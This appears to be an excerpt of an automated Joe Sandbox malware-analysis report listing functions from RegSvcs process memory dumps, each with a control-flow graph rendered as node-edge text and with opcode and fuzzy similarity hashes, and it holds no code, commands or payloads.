                                                                        Function 02C20CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 958 2c20ce8-2c20d54 GetConsoleWindow 961 2c20d56-2c20d5c 958->961 962 2c20d5d-2c20d82 958->962 961->962
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1629356994.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_2c20000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: 6aeaf015a07766d3b85870f4e615b89669f51757cc9713438e7478de66fd00da
                                                                        • Instruction ID: 8c495a7d3d87d578e611478aa0f3b865b6ba5951ed9b196a51f33b60efbdd590
                                                                        • Opcode Fuzzy Hash: 6aeaf015a07766d3b85870f4e615b89669f51757cc9713438e7478de66fd00da
                                                                        • Instruction Fuzzy Hash: 4C1103B1D003598FDB24DFAAC84579FFBF5EB88224F24881AC519A7240CB79A544CBA5
                                                                        Function 063E1550 Relevance: 1.4, Instructions: 1408COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 966 63e1550-63e1573 967 63e1575-63e1580 966->967 968 63e1581-63e15d7 966->968 967->968 973 63e15dd-63e160d 968->973 974 63e19a7-63e19f9 968->974 973->974 982 63e1613-63e1643 973->982 977 63e19fb-63e1a01 974->977 978 63e1a11-63e1a6c 974->978 979 63e1a05-63e1a0f 977->979 980 63e1a03 977->980 996 63e27b2-63e27f8 978->996 997 63e1a72-63e1a87 978->997 979->978 980->978 982->974 989 63e1649-63e1679 982->989 989->974 994 63e167f-63e16af 989->994 994->974 1005 63e16b5-63e16e5 994->1005 1002 63e27fa-63e2800 996->1002 1003 63e2810-63e2888 996->1003 997->996 1004 63e1a8d-63e1abe 997->1004 1006 63e2804-63e280e 1002->1006 1007 63e2802 1002->1007 1028 63e288a-63e28b0 1003->1028 1029 63e28b2-63e28b9 1003->1029 1015 63e1ad8-63e1b24 1004->1015 1016 63e1ac0-63e1ad6 1004->1016 1005->974 1017 63e16eb-63e171b 1005->1017 1006->1003 1007->1003 1026 63e1b2b-63e1b48 1015->1026 1016->1026 1017->974 1031 63e1721-63e1751 1017->1031 1026->996 1036 63e1b4e-63e1b80 1026->1036 1028->1029 1031->974 1040 63e1757-63e1787 1031->1040 1042 63e1b9a-63e1be6 1036->1042 1043 63e1b82-63e1b98 1036->1043 1040->974 1048 63e178d-63e17bd 1040->1048 1051 63e1bed-63e1c0a 1042->1051 1043->1051 1048->974 1058 63e17c3-63e17da 1048->1058 1051->996 1057 63e1c10-63e1c42 1051->1057 1064 63e1c5c-63e1ca8 1057->1064 1065 63e1c44-63e1c5a 1057->1065 1058->974 1061 63e17e0-63e180c 1058->1061 1069 63e180e-63e1834 1061->1069 1070 63e1836-63e1878 1061->1070 1073 63e1caf-63e1ccc 1064->1073 1065->1073 1084 63e18a8-63e18d5 1069->1084 1088 63e187a-63e1890 1070->1088 1089 63e1896-63e18a2 1070->1089 1073->996 1081 63e1cd2-63e1d04 1073->1081 1091 63e1d1e-63e1d6a 1081->1091 1092 63e1d06-63e1d1c 1081->1092 1084->974 1094 63e18db-63e190f 1084->1094 1088->1089 1089->1084 1100 63e1d71-63e1d8e 1091->1100 1092->1100 1094->974 1104 63e1915-63e1958 1094->1104 1100->996 1105 63e1d94-63e1dc6 1100->1105 1104->974 1117 63e195a-63e198a 1104->1117 1111 63e1dc8-63e1dde 1105->1111 1112 63e1de0-63e1e38 1105->1112 1121 63e1e3f-63e1e5c 1111->1121 1112->1121 1117->974 1125 63e198c-63e19a4 1117->1125 1121->996 1127 63e1e62-63e1e94 1121->1127 1131 63e1eae-63e1f0c 1127->1131 1132 63e1e96-63e1eac 1127->1132 1137 63e1f13-63e1f30 1131->1137 1132->1137 1137->996 1140 63e1f36-63e1f68 1137->1140 1144 63e1f6a-63e1f80 1140->1144 1145 63e1f82-63e1fe0 1140->1145 1150 63e1fe7-63e2004 1144->1150 1145->1150 1150->996 1154 63e200a-63e203c 1150->1154 1157 63e203e-63e2054 1154->1157 1158 63e2056-63e20b4 1154->1158 1163 63e20bb-63e20d8 1157->1163 1158->1163 1163->996 1166 63e20de-63e2110 1163->1166 1170 63e212a-63e2188 1166->1170 1171 63e2112-63e2128 1166->1171 1176 63e218f-63e21ac 1170->1176 1171->1176 1176->996 1180 63e21b2-63e21c7 1176->1180 1180->996 1182 63e21cd-63e21fe 1180->1182 1185 63e2218-63e2276 1182->1185 1186 63e2200-63e2216 1182->1186 1191 63e227d-63e229a 1185->1191 1186->1191 1191->996 1194 63e22a0-63e22d2 1191->1194 1198 63e22ec-63e234a 1194->1198 1199 63e22d4-63e22ea 1194->1199 1204 63e2351-63e236e 1198->1204 1199->1204 1204->996 1208 63e2374-63e23a6 1204->1208 1211 63e23a8-63e23be 1208->1211 1212 63e23c0-63e241e 1208->1212 1217 63e2425-63e2442 1211->1217 1212->1217 1217->996 1221 63e2448-63e247a 1217->1221 1224 63e247c-63e2492 1221->1224 1225 63e2494-63e24f2 1221->1225 1230 63e24f9-63e2516 1224->1230 1225->1230 1230->996 1234 63e251c-63e2531 1230->1234 1234->996 1236 63e2537-63e2568 1234->1236 1239 63e256a-63e2580 1236->1239 1240 63e2582-63e25e0 1236->1240 1245 63e25e7-63e2604 1239->1245 1240->1245 1245->996 1248 63e260a-63e261f 1245->1248 1248->996 1251 63e2625-63e2656 1248->1251 1254 63e2658-63e266e 1251->1254 1255 63e2670-63e26ce 1251->1255 1260 63e26d5-63e26f2 1254->1260 1255->1260 1260->996 1264 63e26f8-63e2724 1260->1264 1267 63e273e-63e2793 1264->1267 1268 63e2726-63e273c 1264->1268 1273 63e279a-63e27af 1267->1273 1268->1273
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fed840571d621f54ca64ad76e1a3e0ae32189f449e6f59d9787d093cab67283
                                                                        • Instruction ID: 49deb412dc23453c47d0e63822b6df8b841223ebe3fcaaf6657a653ca36c1260
                                                                        • Opcode Fuzzy Hash: 9fed840571d621f54ca64ad76e1a3e0ae32189f449e6f59d9787d093cab67283
                                                                        • Instruction Fuzzy Hash: 3CC24F35B006189FCB14DB68C890BAEB7B6FF88704F114095E605AB3A1DB71EE85DF91
                                                                        Function 06DFC720 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1277 6dfc720-6dfc759 1279 6dfc75e-6dfc78e call 6dfbe70 1277->1279 1280 6dfc75b 1277->1280 1284 6dfc7ec-6dfc7fb call 6dfbe70 1279->1284 1285 6dfc790-6dfc79f call 6dfbe70 1279->1285 1280->1279 1292 6dfc7fd-6dfc813 1284->1292 1293 6dfc815-6dfc829 1284->1293 1290 6dfc7d4-6dfc7df 1285->1290 1291 6dfc7a1-6dfc7b1 1285->1291 1408 6dfc7e2 call 6dfcdf8 1290->1408 1409 6dfc7e2 call 6dfcde8 1290->1409 1291->1290 1294 6dfc7b3-6dfc7d2 call 6df7548 1291->1294 1299 6dfc82b-6dfc869 1292->1299 1293->1299 1294->1284 1294->1290 1296 6dfc7e8-6dfc7ea 1296->1299 1303 6dfc86b-6dfc873 1299->1303 1304 6dfc875-6dfc87b 1299->1304 1305 6dfc87e-6dfc880 1303->1305 1304->1305 1306 6dfc889-6dfc8ae call 6df06f8 call 6df0770 1305->1306 1307 6dfc882-6dfc887 1305->1307 1327 6dfc8c3 1306->1327 1328 6dfc8b0-6dfc8c1 1306->1328 1308 6dfc8c6-6dfc8c8 1307->1308 1309 6dfc8ca-6dfc8ce 1308->1309 1310 6dfc910-6dfc917 1308->1310 1309->1310 1312 6dfc8d0-6dfc8f9 1309->1312 1314 6dfcb8e-6dfcbbf 1310->1314 1315 6dfc91d-6dfc927 call 6dfbe50 1310->1315 1324 6dfc8fb-6dfc8fd 1312->1324 1325 6dfc905-6dfc90b 1312->1325 1335 6dfcbcb-6dfcbd2 1314->1335 1336 6dfcbc1-6dfcbc3 1314->1336 1322 6dfc99d-6dfc9a4 1315->1322 1323 6dfc929-6dfc92d 1315->1323 1331 6dfc9aa-6dfc9bc 1322->1331 1332 6dfca32-6dfca3b 1322->1332 1329 6dfc92f-6dfc946 1323->1329 1330 6dfc94b-6dfc998 1323->1330 1324->1325 1334 6dfcc4f-6dfcc56 1325->1334 1327->1308 1328->1308 1329->1334 1330->1314 1331->1332 1346 6dfc9be-6dfc9c2 1331->1346 1337 6dfca3d-6dfca43 1332->1337 1338 6dfca46-6dfca8b call 6df9170 1332->1338 1343 6dfcbda-6dfcbe0 1335->1343 1344 6dfcbd4-6dfcbd8 1335->1344 1336->1335 1337->1338 1338->1314 1382 6dfca91-6dfca95 1338->1382 1347 6dfcbea-6dfcbee 1343->1347 1348 6dfcbe2-6dfcbe4 1343->1348 1344->1347 1351 6dfc9c4-6dfc9db 1346->1351 1352 6dfc9e0-6dfca2d 1346->1352 1355 6dfcc14-6dfcc1e call 6dfbe50 1347->1355 1356 6dfcbf0-6dfcbf9 1347->1356 1348->1347 1354 6dfcbe6 1348->1354 1351->1334 1352->1314 1354->1347 1367 6dfcc40-6dfcc44 1355->1367 1368 6dfcc20-6dfcc37 1355->1368 1359 6dfcbfb-6dfcc01 1356->1359 1360 6dfcc03-6dfcc0a 1356->1360 1361 6dfcc0d 1359->1361 1360->1361 1361->1355 1371 6dfcc4d 1367->1371 1372 6dfcc46 1367->1372 1368->1367 1383 6dfcc39 1368->1383 1371->1334 1372->1371 1384 6dfca97-6dfcaae 1382->1384 1385 6dfcab3-6dfcab6 1382->1385 1383->1367 1384->1334 1387 6dfcabc-6dfcb3f 1385->1387 1388 6dfcb41-6dfcb83 1385->1388 1387->1314 1388->1314 1408->1296 1409->1296
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 948f80f5182ded5bcebcc6cf915309b8cad0be4dd160412d794b4cb95c9c6037
                                                                        • Instruction ID: f19e0db7d5ebbbe9a32977855c80b4e598e80e8d75a0f66c8b93ea0c42d87af5
                                                                        • Opcode Fuzzy Hash: 948f80f5182ded5bcebcc6cf915309b8cad0be4dd160412d794b4cb95c9c6037
                                                                        • Instruction Fuzzy Hash: 9D518D75E20249DFDB11CF68C484AAFBBF6EF89300F1A8065EA459B251D730ED55CBA0
                                                                        Function 063E349D Relevance: 1.3, Instructions: 1277COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1410 63e349d-63e3526 1418 63e352c-63e355d 1410->1418 1421 63e355f-63e3578 1418->1421 1422 63e357b-63e35c7 1418->1422 1426 63e35cd-63e35df 1422->1426 1427 63e36d6-63e3706 1422->1427 1430 63e35e1-63e35f0 1426->1430 1436 63e370c-63e371b 1427->1436 1437 63e3798-63e37a3 1427->1437 1434 63e35f2-63e3627 1430->1434 1435 63e3663-63e3667 1430->1435 1462 63e363f-63e3661 1434->1462 1463 63e3629-63e362f 1434->1463 1438 63e3669-63e3674 1435->1438 1439 63e3676 1435->1439 1449 63e371d-63e3746 1436->1449 1450 63e376b-63e376f 1436->1450 1442 63e37ab-63e37b5 1437->1442 1441 63e367b-63e367e 1438->1441 1439->1441 1445 63e36b4-63e36d1 1441->1445 1446 63e3680-63e3684 1441->1446 1445->1442 1447 63e3686-63e3691 1446->1447 1448 63e3693 1446->1448 1452 63e3695-63e3697 1447->1452 1448->1452 1477 63e375e-63e3769 1449->1477 1478 63e3748-63e374e 1449->1478 1453 63e377e 1450->1453 1454 63e3771-63e377c 1450->1454 1457 63e369d-63e36a6 1452->1457 1458 63e37b8-63e37c5 1452->1458 1459 63e3780-63e3782 1453->1459 1454->1459 1475 63e36a7-63e36ae 1457->1475 1465 63e37cc-63e37ea 1458->1465 1459->1465 1466 63e3784-63e378d 1459->1466 1462->1475 1468 63e3633-63e3635 1463->1468 1469 63e3631 1463->1469 1479 63e378e-63e3792 1466->1479 1468->1462 1469->1462 1475->1430 1475->1445 1477->1479 1480 63e3752-63e3754 1478->1480 1481 63e3750 1478->1481 1479->1436 1479->1437 1480->1477 1481->1477
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ed7aa7401eb9c1d8de29b9bfbdb82ed15d9c3bb354bdf22d636801cf31bf76b
                                                                        • Instruction ID: f97b717b7207b739643a6c3c0945d58bb7098ebf540dc184116662c8b0724319
                                                                        • Opcode Fuzzy Hash: 8ed7aa7401eb9c1d8de29b9bfbdb82ed15d9c3bb354bdf22d636801cf31bf76b
                                                                        • Instruction Fuzzy Hash: 4BA1D774B002549FDB54DB78C894A6EBBF2EF89300B158469E506DB3A2DF30DC45CBA1
                                                                        Function 063E0048 Relevance: .7, Instructions: 665COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1757 63e0048-63e006e 1760 63e0086-63e00a4 1757->1760 1761 63e0070-63e0076 1757->1761 1766 63e00ab-63e00b8 1760->1766 1762 63e007a-63e007c 1761->1762 1763 63e0078 1761->1763 1762->1760 1763->1760 1768 63e00be-63e00d5 1766->1768 1769 63e0734-63e073d 1766->1769 1768->1766 1771 63e00d7 1768->1771 1772 63e00de-63e0104 1771->1772 1773 63e030e-63e0331 1771->1773 1774 63e01ac-63e01cf 1771->1774 1775 63e03fa-63e0428 1771->1775 1776 63e0298-63e02bb 1771->1776 1777 63e0144-63e01a7 1771->1777 1778 63e0384-63e03a7 1771->1778 1779 63e0222-63e0250 1771->1779 1780 63e0470-63e049e 1771->1780 1792 63e010a-63e013f 1772->1792 1824 63e0337-63e033b 1773->1824 1825 63e0884-63e08b3 1773->1825 1821 63e01d5-63e01d9 1774->1821 1822 63e0740-63e076f 1774->1822 1803 63e042a-63e0430 1775->1803 1804 63e0440-63e046b 1775->1804 1819 63e07e2-63e0811 1776->1819 1820 63e02c1-63e02c5 1776->1820 1777->1766 1817 63e03ad-63e03b1 1778->1817 1818 63e0926-63e0955 1778->1818 1799 63e0268-63e0293 1779->1799 1800 63e0252-63e0258 1779->1800 1801 63e04b6-63e04e1 1780->1801 1802 63e04a0-63e04a6 1780->1802 1792->1766 1799->1766 1812 63e025c-63e025e 1800->1812 1813 63e025a 1800->1813 1801->1766 1815 63e04aa-63e04ac 1802->1815 1816 63e04a8 1802->1816 1805 63e0434-63e0436 1803->1805 1806 63e0432 1803->1806 1804->1766 1805->1804 1806->1804 1812->1799 1813->1799 1815->1801 1816->1801 1829 63e03b7-63e03c1 1817->1829 1830 63e0992-63e0cfb 1817->1830 1839 63e095c-63e098b 1818->1839 1843 63e0818-63e0847 1819->1843 1831 63e084e-63e087d 1820->1831 1832 63e02cb-63e02d5 1820->1832 1833 63e01df-63e01e9 1821->1833 1834 63e07ac-63e07db 1821->1834 1845 63e0776-63e07a5 1822->1845 1835 63e08f0-63e091f 1824->1835 1836 63e0341-63e034b 1824->1836 1849 63e08ba-63e08e9 1825->1849 1829->1839 1840 63e03c7-63e03f5 1829->1840 1831->1825 1842 63e02db-63e0309 1832->1842 1832->1843 1844 63e01ef-63e021d 1833->1844 1833->1845 1834->1819 1835->1818 1836->1849 1850 63e0351-63e037f 1836->1850 1839->1830 1840->1766 1842->1766 1843->1831 1844->1766 1845->1834 1849->1835 1850->1766
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b024f1a7f50267a33d227f71f20cf26337069d8be87cea59a25c0bf0571641a5
                                                                        • Instruction ID: 1759cb4cbcc4385b603ab3acdf10a8d97d316cfcc82bc48cebd2abc90744086e
                                                                        • Opcode Fuzzy Hash: b024f1a7f50267a33d227f71f20cf26337069d8be87cea59a25c0bf0571641a5
                                                                        • Instruction Fuzzy Hash: 5C428931700B148FDB28AFB8D4546AEB7B2BFC5700F45495CD5039B391DBB6AE098B82
                                                                        Function 06DFCDF8 Relevance: .5, Instructions: 458COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1956 6dfcdf8-6dfce1b 1957 6dfce23-6dfce43 1956->1957 1959 6dfce49-6dfce4b 1957->1959 1960 6dfcfb4-6dfcfb6 1957->1960 1961 6dfcf0f-6dfcf9f 1959->1961 1962 6dfce51-6dfce58 1959->1962 1963 6dfcfbf-6dfcfc6 1960->1963 1964 6dfcfb8-6dfcfba 1960->1964 2040 6dfcfad-6dfcfaf 1961->2040 2041 6dfcfa1-6dfcfa4 1961->2041 1967 6dfce5a-6dfce62 1962->1967 1968 6dfce67-6dfcef7 1962->1968 1965 6dfcfc8-6dfcfdc 1963->1965 1966 6dfcfe5-6dfcfe7 1963->1966 1969 6dfd3d7-6dfd3de 1964->1969 1965->1966 1980 6dfcfde-6dfcfe0 1965->1980 1970 6dfcfed-6dfcff4 1966->1970 1971 6dfd1a4-6dfd1ba 1966->1971 1967->1969 2046 6dfcef9-6dfceff 1968->2046 2047 6dfcf08-6dfcf0a 1968->2047 1974 6dfd0cd-6dfd0d4 1970->1974 1975 6dfcffa-6dfd005 1970->1975 1986 6dfd1bc-6dfd1ee 1971->1986 1987 6dfd1f8-6dfd20b 1971->1987 1977 6dfd138-6dfd13a 1974->1977 1978 6dfd0d6-6dfd0e1 1974->1978 1981 6dfd00d 1975->1981 1982 6dfd007-6dfd00b 1975->1982 1977->1969 1984 6dfd0e9 1978->1984 1985 6dfd0e3-6dfd0e7 1978->1985 1980->1969 1988 6dfd00f-6dfd011 1981->1988 1982->1988 1990 6dfd0eb-6dfd0ed 1984->1990 1985->1990 1986->1987 2023 6dfd1f0-6dfd1f3 1986->2023 1998 6dfd20d-6dfd21c 1987->1998 1999 6dfd222-6dfd240 1987->1999 1988->1974 1991 6dfd017-6dfd023 1988->1991 1990->1977 1994 6dfd0ef-6dfd0fb 1990->1994 1991->1974 1996 6dfd029-6dfd0b9 1991->1996 1994->1977 2001 6dfd0fd-6dfd109 1994->2001 2034 6dfd13f-6dfd174 1996->2034 2072 6dfd0bf-6dfd0cb 1996->2072 1998->1999 2009 6dfd3d5 1998->2009 2018 6dfd29a-6dfd2a0 1999->2018 2019 6dfd242-6dfd259 1999->2019 2001->1977 2002 6dfd10b-6dfd136 2001->2002 2002->2034 2009->1969 2024 6dfd2e3-6dfd2f6 call 6df6bc0 2018->2024 2025 6dfd2a2-6dfd2b1 2018->2025 2019->2018 2048 6dfd25b-6dfd268 2019->2048 2023->1987 2031 6dfd1f5 2023->2031 2043 6dfd2fc-6dfd308 call 6df7280 2024->2043 2044 6dfd3d2 2024->2044 2036 6dfd2dd-6dfd2e0 2025->2036 2037 6dfd2b3-6dfd2be 2025->2037 2031->1987 2074 6dfd19d-6dfd19f 2034->2074 2075 6dfd176-6dfd195 call 6df9510 2034->2075 2036->2024 2037->2024 2057 6dfd2c0-6dfd2cc call 6df7a68 2037->2057 2040->1969 2041->2040 2054 6dfd36f-6dfd3c7 2043->2054 2055 6dfd30a-6dfd36d 2043->2055 2044->2009 2046->2047 2047->1969 2048->2018 2058 6dfd26a-6dfd275 2048->2058 2054->2044 2055->2044 2057->2024 2066 6dfd2ce-6dfd2db 2057->2066 2058->2018 2068 6dfd277-6dfd281 call 6df7300 2058->2068 2066->2024 2066->2036 2068->2018 2081 6dfd283-6dfd296 2068->2081 2072->2034 2074->1969 2075->2074 2081->2018
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b35602a2c28bb3790459a8171eb7b6dfdf432c53b1137b3452e127b53d03571e
                                                                        • Instruction ID: fdc867277a0478caf9fac1f0245500d35b034c64c6bd082a18e9b77b1d512efd
                                                                        • Opcode Fuzzy Hash: b35602a2c28bb3790459a8171eb7b6dfdf432c53b1137b3452e127b53d03571e
                                                                        • Instruction Fuzzy Hash: A8124870A10205CFD798EFA8C894A6EB7F3BF88304B158468E616DB395DB75EC41CB90
                                                                        Function 06DFE548 Relevance: .4, Instructions: 405COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2195 6dfe548-6dfe560 2197 6dfe56f-6dfe57a 2195->2197 2198 6dfe562-6dfe56d 2195->2198 2202 6dfe57c-6dfe585 2197->2202 2203 6dfe58a-6dfe58c 2197->2203 2198->2197 2201 6dfe591-6dfe59c 2198->2201 2207 6dfe59e-6dfe5c0 2201->2207 2208 6dfe5dc-6dfe5e1 2201->2208 2204 6dfea07-6dfea13 2202->2204 2203->2204 2212 6dfe5e6-6dfe5f4 2207->2212 2213 6dfe5c2-6dfe5da 2207->2213 2208->2204 2216 6dfe5fa-6dfe608 2212->2216 2217 6dfe7a8-6dfe7b6 2212->2217 2213->2208 2213->2212 2216->2217 2221 6dfe60e-6dfe619 2216->2221 2222 6dfe7bc-6dfe7ca 2217->2222 2223 6dfe8f7-6dfe905 2217->2223 2227 6dfe61f-6dfe62b 2221->2227 2228 6dfe7a1-6dfe7a3 2221->2228 2222->2223 2229 6dfe7d0-6dfe7db 2222->2229 2230 6dfe90b-6dfe919 2223->2230 2231 6dfea05 2223->2231 2227->2228 2235 6dfe631-6dfe63d 2227->2235 2228->2204 2236 6dfe7e1-6dfe805 2229->2236 2237 6dfe8f0-6dfe8f2 2229->2237 2230->2231 2238 6dfe91f-6dfe92a 2230->2238 2231->2204 2235->2228 2244 6dfe643-6dfe664 2235->2244 2236->2237 2250 6dfe80b-6dfe829 2236->2250 2237->2204 2242 6dfea01-6dfea03 2238->2242 2243 6dfe930-6dfe951 2238->2243 2242->2204 2243->2242 2256 6dfe957-6dfe97b 2243->2256 2244->2228 2255 6dfe66a-6dfe68e 2244->2255 2250->2237 2259 6dfe82f-6dfe84b 2250->2259 2255->2228 2269 6dfe694-6dfe6b6 2255->2269 2256->2242 2271 6dfe981-6dfe9a5 2256->2271 2264 6dfe88e-6dfe8a7 2259->2264 2265 6dfe84d-6dfe863 2259->2265 2272 6dfe8a9-6dfe8bd 2264->2272 2273 6dfe8e5 2264->2273 2274 6dfe86c-6dfe88c 2265->2274 2275 6dfe865 2265->2275 2269->2228 2289 6dfe6bc-6dfe6da 2269->2289 2271->2242 2290 6dfe9a7-6dfe9d3 2271->2290 2282 6dfe8bf 2272->2282 2283 6dfe8c6-6dfe8e3 2272->2283 2319 6dfe8e5 call 6dfec8f 2273->2319 2320 6dfe8e5 call 6dfeca0 2273->2320 2274->2264 2275->2274 2279 6dfe8eb 2279->2204 2282->2283 2283->2273 2289->2228 2296 6dfe6e0-6dfe6fc 2289->2296 2290->2242 2299 6dfe9d5-6dfe9ff 2290->2299 2300 6dfe73f-6dfe758 2296->2300 2301 6dfe6fe-6dfe714 2296->2301 2299->2204 2306 6dfe75a-6dfe76e 2300->2306 2307 6dfe796-6dfe79c 2300->2307 2308 6dfe71d-6dfe73d 2301->2308 2309 6dfe716 2301->2309 2314 6dfe777-6dfe794 2306->2314 2315 6dfe770 2306->2315 2307->2204 2308->2300 2309->2308 2314->2307 2315->2314 2319->2279 2320->2279
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a8ea93adc2446640e0525b678cb6bfd8c5558d0f10accd6094550d1ca7c1ae0
                                                                        • Instruction ID: 41892eae89b54abfefbf3eda0bddc697a2fd56fb27d61d03af9f8c29f0b39e0c
                                                                        • Opcode Fuzzy Hash: 7a8ea93adc2446640e0525b678cb6bfd8c5558d0f10accd6094550d1ca7c1ae0
                                                                        • Instruction Fuzzy Hash: D1E12B34B201019FD794EB3EC998A2977E6AFC9B147168069EA06CB375EF71EC01CB50
                                                                        Function 063E0001 Relevance: .3, Instructions: 348COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2432 63e0001-63e0014 2433 63e004d-63e0065 2432->2433 2434 63e0016-63e004c 2432->2434 2436 63e006c-63e006e 2433->2436 2434->2433 2437 63e0086-63e00a4 2436->2437 2438 63e0070-63e0076 2436->2438 2443 63e00ab-63e00b8 2437->2443 2439 63e007a-63e007c 2438->2439 2440 63e0078 2438->2440 2439->2437 2440->2437 2445 63e00be-63e00d5 2443->2445 2446 63e0734-63e073d 2443->2446 2445->2443 2448 63e00d7 2445->2448 2449 63e00de 2448->2449 2450 63e030e-63e0331 2448->2450 2451 63e01ac-63e01cf 2448->2451 2452 63e03fa-63e0428 2448->2452 2453 63e0298-63e02bb 2448->2453 2454 63e0144-63e01a7 2448->2454 2455 63e0384-63e03a7 2448->2455 2456 63e0222-63e0250 2448->2456 2457 63e0470-63e049e 2448->2457 2459 63e00e8-63e0104 2449->2459 2501 63e0337-63e033b 2450->2501 2502 63e0884-63e08b3 2450->2502 2498 63e01d5-63e01d9 2451->2498 2499 63e0740-63e076f 2451->2499 2480 63e042a-63e0430 2452->2480 2481 63e0440-63e046b 2452->2481 2496 63e07e2-63e0811 2453->2496 2497 63e02c1-63e02c5 2453->2497 2454->2443 2494 63e03ad-63e03b1 2455->2494 2495 63e0926-63e0955 2455->2495 2476 63e0268-63e0293 2456->2476 2477 63e0252-63e0258 2456->2477 2478 63e04b6-63e04e1 2457->2478 2479 63e04a0-63e04a6 2457->2479 2469 63e010a-63e013f 2459->2469 2469->2443 2476->2443 2489 63e025c-63e025e 2477->2489 2490 63e025a 2477->2490 2478->2443 2492 63e04aa-63e04ac 2479->2492 2493 63e04a8 2479->2493 2482 63e0434-63e0436 2480->2482 2483 63e0432 2480->2483 2481->2443 2482->2481 2483->2481 2489->2476 2490->2476 2492->2478 2493->2478 2506 63e03b7-63e03c1 2494->2506 2507 63e0992-63e0cfb 2494->2507 2516 63e095c-63e098b 2495->2516 2520 63e0818-63e0847 2496->2520 2508 63e084e-63e087d 2497->2508 2509 63e02cb-63e02d5 2497->2509 2510 63e01df-63e01e9 2498->2510 2511 63e07ac-63e07db 2498->2511 2522 63e0776-63e07a5 2499->2522 2512 63e08f0-63e091f 2501->2512 2513 63e0341-63e034b 2501->2513 2526 63e08ba-63e08e9 2502->2526 2506->2516 2517 63e03c7-63e03f5 2506->2517 2508->2502 2519 63e02db-63e0309 2509->2519 2509->2520 2521 63e01ef-63e021d 2510->2521 2510->2522 2511->2496 2512->2495 2513->2526 2527 63e0351-63e037f 2513->2527 2516->2507 2517->2443 2519->2443 2520->2508 2521->2443 2522->2511 2526->2512 2527->2443
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18c0d6a343e05505e51593667713ef116947421ec09b3496280b1de5b877d9c3
                                                                        • Instruction ID: a8f71607a4d03d60bdde508ba4715be2aef5098e22b71b1f44d390e8d52a9ac1
                                                                        • Opcode Fuzzy Hash: 18c0d6a343e05505e51593667713ef116947421ec09b3496280b1de5b877d9c3
                                                                        • Instruction Fuzzy Hash: 8FD1AD30B002589FDB059FA4C854B6E7BB6BF89700F148096E501DF3A2DBB1DD59CBA2
                                                                        Function 06DFF8A8 Relevance: .3, Instructions: 344COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
